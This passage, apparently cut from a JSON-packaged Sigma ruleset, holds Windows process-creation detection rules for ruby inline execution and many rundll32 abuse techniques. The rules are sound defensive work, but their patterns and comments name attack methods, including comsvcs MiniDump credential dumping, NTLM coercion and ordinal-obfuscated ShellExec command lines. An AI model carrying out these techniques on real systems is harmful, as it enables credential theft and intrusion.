    "content": "title: Ruby Inline Command Execution\nid: 20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8\nstatus: test\ndescription: Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ruby.exe'\n        - OriginalFileName: 'ruby.exe'\n    selection_cli:\n        CommandLine|contains: ' -e'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml",
    "content": "title: Potential Rundll32 Execution With DLL Stored In ADS\nid: 9248c7e1-2bf3-4661-a22c-600a8040b446\nstatus: test\ndescription: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Rundll32\nauthor: Harjot Singh, '@cyb3rjy0t'\ndate: 2023-01-21\nmodified: 2023-02-08\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        # Example:\n        #   rundll32 \"C:\\ads\\file.txt:ADSDLL.dll\",DllMain\n        # Note: This doesn't cover the use case where a full path for the DLL isn't used. As it requires a more expensive regex\n        CommandLine|re: '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml",
    "content": "title: Suspicious Advpack Call Via Rundll32.EXE\nid: a1473adb-5338-4a20-b4c3-126763e2d3d3\nstatus: test\ndescription: Detects execution of \"rundll32\" calling \"advpack.dll\" with potential obfuscated ordinal calls in order to leverage the \"RegisterOCX\" function\nreferences:\n    - https://twitter.com/Hexacorn/status/1224848930795552769\n    - http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n        - CommandLine|contains: 'rundll32'\n    selection_cli_dll:\n        CommandLine|contains: 'advpack'\n    selection_cli_ordinal:\n        - CommandLine|contains|all:\n              - '#+'\n              - '12'\n        - CommandLine|contains: '#-'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_inline_vbs.yml",
    "content": "title: Suspicious Rundll32 Invoking Inline VBScript\nid: 1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd\nstatus: test\ndescription: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-05\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'rundll32.exe'\n            - 'Execute'\n            - 'RegRead'\n            - 'window.close'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml",
    "content": "title: Rundll32 InstallScreenSaver Execution\nid: 15bd98ea-55f4-4d37-b09a-e7caa0fa2221\nstatus: test\ndescription: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver\nreferences:\n    - https://lolbas-project.github.io/lolbas/Libraries/Desk/\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl\nauthor: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec'\ndate: 2022-04-28\nmodified: 2023-02-09\ntags:\n    - attack.t1218.011\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains: 'InstallScreenSaver'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate installation of a new screensaver\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_keymgr.yml",
    "content": "title: Suspicious Key Manager Access\nid: a4694263-59a8-4608-a3a0-6f8d3a51664c\nstatus: test\ndescription: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)\nreferences:\n    - https://twitter.com/NinjaParanoid/status/1516442028963659777\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-21\nmodified: 2023-02-09\ntags:\n    - attack.credential-access\n    - attack.t1555.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'keymgr'\n            - 'KRShowKeyMgr'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml",
    "content": "title: Mshtml.DLL RunHTMLApplication Suspicious Usage\nid: 4782eb5a-a513-4523-a0ac-f3082b26ac5c\nrelated:\n    - id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3\n      type: obsolete\n    - id: 73fcad2e-ff14-4c38-b11d-4172c8ac86c7\n      type: obsolete\nstatus: test\ndescription: |\n    Detects execution of commands that leverage the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)\nreferences:\n    - https://twitter.com/n1nj4sec/status/1421190238081277959\n    - https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt\n    - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt\nauthor: Nasreddine Bencherchali (Nextron Systems),  Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)\ndate: 2022-08-14\nmodified: 2024-02-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\..\\'\n            - 'mshtml'\n        CommandLine|contains:\n            - '#135'\n            - 'RunHTMLApplication'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_no_params.yml",
    "content": "title: Rundll32 Execution Without CommandLine Parameters\nid: 1775e15e-b61b-4d14-a1a3-80981298085a\nstatus: test\ndescription: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity\nreferences:\n    - https://www.cobaltstrike.com/help-opsec\n    - https://twitter.com/ber_m1ng/status/1397948048135778309\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-27\nmodified: 2023-08-31\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|endswith:\n            - '\\rundll32.exe'\n            - '\\rundll32.exe\"'\n            - '\\rundll32'\n    filter:\n        ParentImage|contains:\n            - '\\AppData\\Local\\'\n            - '\\Microsoft\\Edge\\'\n    condition: selection and not filter\nfalsepositives:\n    - Possible but rare\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml",
    "content": "title: Suspicious NTLM Authentication on the Printer Spooler Service\nid: bb76d96b-821c-47cf-944b-7ce377864492\nstatus: test\ndescription: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service\nreferences:\n    - https://twitter.com/med0x2e/status/1520402518685200384\n    - https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml\nauthor: Elastic (idea), Tobias Michalski (Nextron Systems)\ndate: 2022-05-04\nmodified: 2023-02-09\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1212\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'C:\\windows\\system32\\davclnt.dll,DavSetCookie'\n            - 'http'\n        CommandLine|contains:\n            - 'spoolss'\n            - 'srvsvc'\n            - '/print/pipe/'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml",
    "content": "title: Potential Obfuscated Ordinal Call Via Rundll32\nid: 43fa5350-db63-4b8f-9a01-789a427074e1\nstatus: test\ndescription: Detects execution of \"rundll32\" with potential obfuscated ordinal calls\nreferences:\n    - Internal Research\n    - https://www.youtube.com/watch?v=52tAmVLg1KM&t=2070s\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2023-05-17\nmodified: 2025-02-23\ntags:\n    - attack.defense-evasion\n    - attack.t1027.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n        - CommandLine|contains: 'rundll32'\n    selection_cli:\n        CommandLine|contains:\n            - '#+'\n            - '#-'\n            # ordinal can be represented by adding any number of zeros in front ordinal number, for e.g. 000000024\n            - '#0'\n            # ordinal is 16 bit ordinal, so if you make the number large enough (don't fit in 16 bit space), then it normally wraps around.\n            # for e.g ordinal 24 can be also represented by 65560 (65536+24)\n            - '#655'\n            - '#656'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml",
    "content": "title: Rundll32 Spawned Via Explorer.EXE\nid: 1723e720-616d-4ddc-ab02-f7e3685a4713\nstatus: test\ndescription: Detects execution of \"rundll32.exe\" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: CD_ROM_\ndate: 2022-05-21\nmodified: 2023-08-31\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\explorer.exe'\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    filter_main_generic:\n        - CommandLine|contains: ' C:\\Windows\\System32\\' # The space at the start is required\n        - CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' # Windows 10 volume control\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml",
    "content": "title: Process Memory Dump Via Comsvcs.DLL\nid: 646ea171-dded-4578-8a4d-65e9822892e3\nrelated:\n    - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c\n      type: obsolete\nstatus: test\ndescription: Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)\nreferences:\n    - https://twitter.com/shantanukhande/status/1229348874298388484\n    - https://twitter.com/pythonresponder/status/1385064506049630211?s=21\n    - https://twitter.com/Hexacorn/status/1224848930795552769\n    - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/\n    - https://twitter.com/SBousseaden/status/1167417096374050817\n    - https://twitter.com/Wietze/status/1542107456507203586\n    - https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py\n    - https://www.youtube.com/watch?v=52tAmVLg1KM&t=2070s\nauthor: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2020-02-18\nmodified: 2025-02-23\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1036\n    - attack.t1003.001\n    - car.2013-05-009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n        - CommandLine|contains: 'rundll32'\n    selection_cli_1:\n        CommandLine|contains|all:\n            - 'comsvcs'\n            - 'full'\n        CommandLine|contains:\n            - '#-'\n            - '#+'\n            - '#24'\n            - '24 '\n            - 'MiniDump' # Matches MiniDump and MinidumpW\n            - '#65560' # ordinal is 16 bit ordinal, so if you make the number large enough (don't fit in 16 bit space), then it normally wraps around.  
for e.g ordinal 24 can be also represented by 65560 (65536+24)\n    selection_generic:\n        CommandLine|contains|all:\n            - '24'\n            - 'comsvcs'\n            - 'full'\n        CommandLine|contains:\n            - ' #'\n            - ',#'\n            - ', #'\n            - '\"#'\n    condition: (selection_img and 1 of selection_cli_*) or selection_generic\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml",
    "content": "title: Rundll32 Registered COM Objects\nid: f1edd233-30b5-4823-9e6a-c4171b24d316\nstatus: test\ndescription: load malicious registered COM objects\nreferences:\n    - https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md\nauthor: frack113\ndate: 2022-02-13\nmodified: 2023-02-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - '-sta '\n            - '-localserver '\n        CommandLine|contains|all:\n            - '{'\n            - '}'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_run_locations.yml",
    "content": "title: Suspicious Process Start Locations\nid: 15b75071-74cc-47e0-b4c6-b43744a62a2b\nstatus: test\ndescription: Detects suspicious process run from unusual locations\nreferences:\n    - https://car.mitre.org/wiki/CAR-2013-05-002\nauthor: juju4, Jonhnathan Ribeiro, oscd.community\ndate: 2019-01-16\nmodified: 2022-01-07\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - car.2013-05-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|contains:\n              - ':\\RECYCLER\\'\n              - ':\\SystemVolumeInformation\\'\n        - Image|startswith:\n              - 'C:\\Windows\\Tasks\\'\n              - 'C:\\Windows\\debug\\'\n              - 'C:\\Windows\\fonts\\'\n              - 'C:\\Windows\\help\\'\n              - 'C:\\Windows\\drivers\\'\n              - 'C:\\Windows\\addins\\'\n              - 'C:\\Windows\\cursors\\'\n              - 'C:\\Windows\\system32\\tasks\\'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml",
    "content": "title: Suspicious Rundll32 Setupapi.dll Activity\nid: 285b85b1-a555-4095-8652-a8a4106af63f\nstatus: test\ndescription: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Libraries/Setupapi/\n    - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf\n    - https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf\n    - https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20\nauthor: Konstantin Grishchenko, oscd.community\ndate: 2020-10-07\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\runonce.exe'\n        ParentImage|endswith: '\\rundll32.exe'\n        ParentCommandLine|contains|all:\n            - 'setupapi.dll'\n            - 'InstallHinfSection'\n    condition: selection\nfalsepositives:\n    - Scripts and administrative tools that use INF files for driver installation with setupapi.dll\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml",
    "content": "title: Shell32 DLL Execution in Suspicious Directory\nid: 32b96012-7892-429e-b26c-ac2bf46066ff\nstatus: test\ndescription: Detects shell32.dll executing a DLL in a suspicious directory\nreferences:\n    - https://www.group-ib.com/resources/threat-research/red-curl-2.html\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-11-24\nmodified: 2023-02-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'shell32.dll'\n            - 'Control_RunDLL'\n        CommandLine|contains:\n            - '%AppData%'\n            - '%LocalAppData%'\n            - '%Temp%'\n            - '%tmp%'\n            - '\\AppData\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml",
    "content": "title: Potential ShellDispatch.DLL Functionality Abuse\nid: 82343930-652f-43f5-ab70-2ee9fdd6d5e9\nstatus: test\ndescription: Detects potential \"ShellDispatch.dll\" functionality abuse to execute arbitrary binaries via \"ShellExecute\"\nreferences:\n    - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-20\ntags:\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains: 'RunDll_ShellExecuteW'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_spawn_explorer.yml",
    "content": "title: RunDLL32 Spawning Explorer\nid: caa06de8-fdef-4c91-826a-7f9e163eef4b\nstatus: test\ndescription: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-november-2021/\nauthor: elhoim, CD_ROM_\ndate: 2022-04-27\nmodified: 2022-05-25\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\rundll32.exe'\n        Image|endswith: '\\explorer.exe'\n    filter:\n        ParentCommandLine|contains: '\\shell32.dll,Control_RunDLL'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml",
    "content": "title: Potentially Suspicious Rundll32 Activity\nid: e593cf51-88db-4ee1-b920-37e89012a3c9\nstatus: test\ndescription: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities\nreferences:\n    - http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/\n    - https://twitter.com/Hexacorn/status/885258886428725250\n    - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52\n    - https://twitter.com/nas_bench/status/1433344116071583746 # dfshim.dll,ShOpenVerbShortcut\n    - https://twitter.com/eral4m/status/1479106975967240209 # scrobj.dll,GenerateTypeLib\n    - https://twitter.com/eral4m/status/1479080793003671557 # shimgvw.dll,ImageView_Fullscreen\nauthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-16\nmodified: 2023-05-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains|all:\n              - 'javascript:'\n              - '.RegisterXLL'\n        - CommandLine|contains|all:\n              - 'url.dll'\n              - 'OpenURL'\n        - CommandLine|contains|all:\n              - 'url.dll'\n              - 'OpenURLA'\n        - CommandLine|contains|all:\n              - 'url.dll'\n              - 'FileProtocolHandler'\n        - CommandLine|contains|all:\n              - 'zipfldr.dll'\n              - 'RouteTheCall'\n        - CommandLine|contains|all:\n              - 'shell32.dll'\n              - 'Control_RunDLL'\n        - CommandLine|contains|all:\n              - 'shell32.dll'\n              - 'ShellExec_RunDLL'\n        - CommandLine|contains|all:\n              - 'mshtml.dll'\n              - 'PrintHTML'\n        - CommandLine|contains|all:\n              - 'advpack.dll'\n              - 'LaunchINFSection'\n        - 
CommandLine|contains|all:\n              - 'advpack.dll'\n              - 'RegisterOCX'\n        - CommandLine|contains|all:\n              - 'ieadvpack.dll'\n              - 'LaunchINFSection'\n        - CommandLine|contains|all:\n              - 'ieadvpack.dll'\n              - 'RegisterOCX'\n        - CommandLine|contains|all:\n              - 'ieframe.dll'\n              - 'OpenURL'\n        - CommandLine|contains|all:\n              - 'shdocvw.dll'\n              - 'OpenURL'\n        - CommandLine|contains|all:\n              - 'syssetup.dll'\n              - 'SetupInfObjectInstallAction'\n        - CommandLine|contains|all:\n              - 'setupapi.dll'\n              - 'InstallHinfSection'\n        - CommandLine|contains|all:\n              - 'pcwutl.dll'\n              - 'LaunchApplication'\n        - CommandLine|contains|all:\n              - 'dfshim.dll'\n              - 'ShOpenVerbApplication'\n        - CommandLine|contains|all:\n              - 'dfshim.dll'\n              - 'ShOpenVerbShortcut'\n        - CommandLine|contains|all:\n              - 'scrobj.dll'\n              - 'GenerateTypeLib'\n              - 'http'\n        - CommandLine|contains|all:\n              - 'shimgvw.dll'\n              - 'ImageView_Fullscreen'\n              - 'http'\n        - CommandLine|contains|all:\n              - 'comsvcs.dll'\n              - 'MiniDump'\n    filter_main_screensaver:\n        CommandLine|contains: 'shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver'\n    filter_main_parent_cpl:  # Settings\n        ParentImage: 'C:\\Windows\\System32\\control.exe'\n        ParentCommandLine|contains: '.cpl'\n        CommandLine|contains|all:\n            - 'Shell32.dll'\n            - 'Control_RunDLL'\n            - '.cpl'\n    filter_main_startmenu:\n        ParentImage: 'C:\\Windows\\System32\\control.exe'\n        CommandLine|startswith: '\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\'\n        
CommandLine|endswith: '.cpl\",'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml",
    "content": "title: Suspicious Control Panel DLL Load\nid: d7eb979b-c2b5-4a6f-a3a7-c87ce6763819\nstatus: test\ndescription: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits\nreferences:\n    - https://twitter.com/rikvduijn/status/853251879320662017\n    - https://twitter.com/felixw3000/status/853354851128025088\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-04-15\nmodified: 2023-02-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\System32\\control.exe'\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    filter:\n        CommandLine|contains: 'Shell32.dll'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml",
    "content": "title: Suspicious Rundll32 Execution With Image Extension\nid: 4aa6040b-3f28-44e3-a769-9208e5feb5ec\nrelated:\n    - id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e\n      type: similar\nstatus: test\ndescription: Detects the execution of Rundll32.exe with DLL files masquerading as image files\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: Hieu Tran\ndate: 2023-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '.bmp'\n            - '.cr2'\n            - '.eps'\n            - '.gif'\n            - '.ico'\n            - '.jpeg'\n            - '.jpg'\n            - '.nef'\n            - '.orf'\n            - '.png'\n            - '.raw'\n            - '.sr2'\n            - '.tif'\n            - '.tiff'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml",
    "content": "title: Suspicious Usage Of ShellExec_RunDLL\nid: d87bd452-6da1-456e-8155-7dc988157b7d\nrelated:\n    - id: 36c5146c-d127-4f85-8e21-01bf62355d5a\n      type: obsolete\n    - id: 8823e85d-31d8-473e-b7f4-92da070f0fc6\n      type: similar\nstatus: test\ndescription: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\n    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\n    - https://github.com/SigmaHQ/sigma/issues/1009\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-01\nmodified: 2022-12-30\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_openasrundll:\n        CommandLine|contains: 'ShellExec_RunDLL'\n    selection_suspcli:\n        CommandLine|contains:\n            # Note: The ordinal number may differ depending on the DLL version\n            - '\\Desktop\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n            - 'comspec'\n            - 'iex'\n            - 'Invoke-'\n            - 'msiexec'\n            - 'odbcconf'\n            - 'regsvr32'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_ordinal_execution.yml",
    "content": "title: Suspicious ShellExec_RunDLL Call Via Ordinal\nid: 8823e85d-31d8-473e-b7f4-92da070f0fc6\nrelated:\n    - id: d87bd452-6da1-456e-8155-7dc988157b7d\n      type: derived\nstatus: test\ndescription: |\n    Detects a suspicious call to the \"ShellExec_RunDLL\" exported function of SHELL32.DLL through its ordinal number to launch other commands.\n    Adversaries might use only the ordinal number in order to bypass existing detections that alert on the usage of ShellExec_RunDLL on the CommandLine.\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\n    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\n    - https://github.com/SigmaHQ/sigma/issues/1009\n    - https://strontic.github.io/xcyclopedia/library/shell32.dll-65DA072F25DE83D9F83653E3FEA3644D.html\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_img:\n        ParentCommandLine|contains: 'SHELL32.DLL'\n    selection_parent_ordinal:\n        ParentCommandLine|contains:\n            # Note: The ordinal number may differ depending on the DLL version\n            # Example: rundll32 SHELL32.DLL,#572 \"cmd.exe\" \"/c calc.exe\"\n            - '#568'\n            - '#570'\n            - '#572'\n            - '#576'\n    selection_susp_cli_parent:\n        # Note: Add additional binaries and suspicious paths to increase coverage\n        - ParentCommandLine|contains:\n              - 'comspec'\n              - 'iex'\n              - 'Invoke-'\n              - 'msiexec'\n              - 'odbcconf'\n              - 'regsvr32'\n        - ParentCommandLine|contains:\n              - '\\Desktop\\'\n              - '\\ProgramData\\'\n              - '\\Temp\\'\n              - '\\Users\\Public\\'\n    selection_susp_child_img:\n        Image|endswith:\n            - '\\bash.exe'\n            - 